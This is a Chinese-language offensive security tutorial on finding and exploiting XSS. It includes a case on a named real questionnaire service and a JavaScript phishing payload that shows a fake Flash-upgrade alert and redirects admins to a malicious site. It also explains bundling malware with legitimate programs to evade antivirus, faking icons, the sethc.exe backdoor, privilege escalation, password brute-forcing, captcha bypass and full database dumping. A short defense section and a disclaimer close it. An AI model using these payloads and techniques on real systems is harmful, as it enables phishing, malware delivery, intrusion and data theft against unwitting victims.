月饼计划之XSS
字数 1420 2025-08-12 11:34:09
XSS漏洞挖掘与利用实战教学文档
一、XSS漏洞基础知识
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web安全漏洞,攻击者能够在受害者的浏览器中执行恶意脚本。
XSS类型
- 反射型XSS:恶意脚本来自当前HTTP请求
- 存储型XSS:恶意脚本被存储到服务器上
- DOM型XSS:通过修改DOM环境而非插入HTML代码实现
基本Payload
<script>alert(1)</script>
二、XSS漏洞挖掘实战
案例1:腾讯问卷存储型XSS
-
发现过程:
- 访问问卷填写页面(https://wj.qq.com/)
- 在用户输入字段尝试插入XSS payload
- 提交后重新访问,发现payload被存储并执行
-
验证方法:
- 创建新问卷
- 在"其他内容"字段插入payload
- 查看回收数据时触发XSS
-
技术要点:
- 存储型XSS需要验证数据是否持久化存储
- 后台查看数据时可能触发XSS
案例2:后台系统XSS钓鱼
-
攻击流程:
- 获取后台系统控制权
- 在登录页面插入XSS代码
- 等待管理员访问触发
-
XSS钓鱼代码示例:
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本过低,尝试升级后访问该页面!");
window.location.href="http://恶意网站/";
- 钓鱼页面制作:
- 使用Fake-flash模板(https://github.com/r00tSe7en/Fake-flash.cn)
- 修改下载地址为恶意程序
- 使用ResourceHacker修改程序图标增加可信度
三、辅助技术
1. SSL Pinning绕过
- 工具:Xposed + JustTrustMe模块
- 原理:Hook证书校验API,强制返回验证通过
2. 密码爆破
- 社工字典生成工具:cupp.py
git clone https://github.com/Mebus/cupp.git
python3 cupp.py -i # 交互模式
3. 验证码绕过
- 工具:captcha-killer
- 配置百度OCR API key
- 参考文档:https://gv7.me/articles/2019/burp-captcha-killer-usage/
4. 提权技术
- Windows提权方法:
- 查找系统漏洞:windows-exploit-suggester.py
- 第三方服务提权(如FileZilla)
- shift后门:替换sethc.exe为cmd.exe
- 启动项后门
- mof提权
5. 数据库导出
mysqldump -uroot -p密码 --all-databases > dump.sql
四、免杀技术
- 多语言转换:如PHP马转EXE
- 自解压捆绑:
- 将恶意程序与正常程序捆绑
- 设置静默安装和覆盖选项
- 图标修改:使用ResourceHacker替换为可信程序图标
- 开源工具:如掩日(可过部分杀软)
五、攻击链构建
- 信息收集 → 2. 漏洞发现 → 3. 初始访问 → 4. 权限提升 → 5. 横向移动 → 6. 数据收集 → 7. 攻击维持 → 8. 痕迹清理
六、防御建议
- 输入过滤:对所有用户输入进行严格过滤
- 输出编码:在输出到页面时进行HTML编码
- CSP策略:实施内容安全策略
- HttpOnly标志:为cookie设置HttpOnly
- XSS防护库:使用DOMPurify等库净化HTML
- 定期审计:对系统进行安全审计和渗透测试
七、工具清单
- Burp Suite
- Xposed + JustTrustMe
- captcha-killer
- windows-exploit-suggester
- FileZilla客户端
- ResourceHacker
- Fake-flash钓鱼模板
- cupp社工字典生成器
通过本教学文档,您应该掌握了从基础XSS发现到复杂攻击链构建的全过程技术要点。请仅将这些技术用于合法授权的安全测试和防御研究。